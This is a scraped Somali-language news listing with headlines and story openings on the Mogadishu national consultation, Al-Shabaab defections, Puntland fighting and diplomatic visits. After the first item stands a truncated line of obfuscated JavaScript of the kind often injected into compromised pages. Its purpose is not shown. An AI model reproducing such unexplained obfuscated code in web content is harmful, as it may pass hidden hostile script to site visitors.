Akhriso War-murtiyeedka laga soo saarey Shirkii Wadatashiga Muqdisho
MUQDISHO, Soomaaliya - Waxaa Maanta lasoo gaba-gabeeyay Shirkii Wadatashiga Qaran ee maalmahan ka socday magaaladda Muqdisho, kaasoo lagu gofeeyay arrimo muhiim ah.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...
Soomaaliya iyo Aljeeriya oo Iska Kaashanaya Kobcinta Ganacsiga iyo Warshadaha
ALGIERS – Dowladaha Soomaaliya iyo Aljeeriya ayaa bilaabay dadaallo lagu xoojinayo iskaashiga ganacsi iyo warshadeed ee u dhexeeya labada dal, kadib kulan muhiim ah...
Tirada Macawiisleyda Isku Dhiibeysa Al-Shabaab oo Sii Kordhaysa Shabeellada Dhexe
JOWHAR - Waxaa si weyn u kordhaya tirada xubnaha kooxda Macawiisleyda ee isku dhiibaya Alshabaab, kuwaas oo ku sugan qeybo kamid ah gobolka Shabeellada...
Dhaqaale Laga Jaray Dowladda xilli uu dalku wajahay xaalado hubanti la’aan doorasho
Muqdisho – Waxaa la sheegay in dhaqaalihii ugu badnaa laga jaray Dowladda Federaalka Soomaaliya, xilli dalka uu cagta saaray xaalado hubanti la’aan ah oo...
Wasaaradda Arrimaha Dibadda: Dhammaan xubnihii wafdigii Shirkii ILO dalka ayay ku soo laabteen
MUQDISHO – Wasaaradda Arrimaha Dibadda ee Soomaaliya ayaa si cad u xaqiijisay in dhammaan xubnaha wafdiga rasmiga ah ee ka socday Soomaaliya ee ka...
Axmed Maclin Fiqi oo booqasho rasmi ah ku tagay Machadka Milateri ee Axmed Bin Maxamed...
DOHA, Qatar – Wasiirka Gaashaandhigga Soomaaliya, Axmed Maxamed Fiqi, ayaa booqasho rasmi ah ku tagay Machadka Milateri ee Axmed Bin Maxamed ee Qatar, halkaas...
Ciidamada Puntland oo Gacanta Ku Dhigay Saldhigyo Daacish Ku Lahayd Togga Baallade
Boosaaso, Puntland – Ciidamada difaaca Puntland ayaa si guul ah gacanta ugu dhigay godadkii ugu dambeeyay ee maleeshiyaadka Daacish kaga dhuumanayeen togga Baallade ee...
Dowladda Soomaaliya oo Guulo ka sheegatay dagaalka Al-Shabaab
Muqdisho – Iyadoo uu dalka ka socdo dagaal culus oo lagula jiro Al-Shabaab, ayaa wararka ka imaanaya gobollada Shabeellaha Dhexe, Shabeellaha Hoose iyo Hiiraan...
Safaaradda Yemen oo xaqiijisay sii-deynta kalluumaysato Yemeniyiin ah oo lagu hayay Boosaaso
Boosaaso, Soomaaliya – Safaaradda Yemen ee Soomaaliya ayaa ku dhawaaqday in la sii daayay toddobo kalluumaysato Yemeniyiin ah oo ay hayeen hay’adaha ammaanka ee...
Xamsa Cabdi Barre oo guddoomiyey Gogosha Wadatashiga Qaran
MUQDISHO, Soomaaliya - Ra’iisul Wasaraaha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, oo guddoomiyey Gogosha Wadatashiga Qaran oo maalintii 2-aad ka socota Muqdisho,...














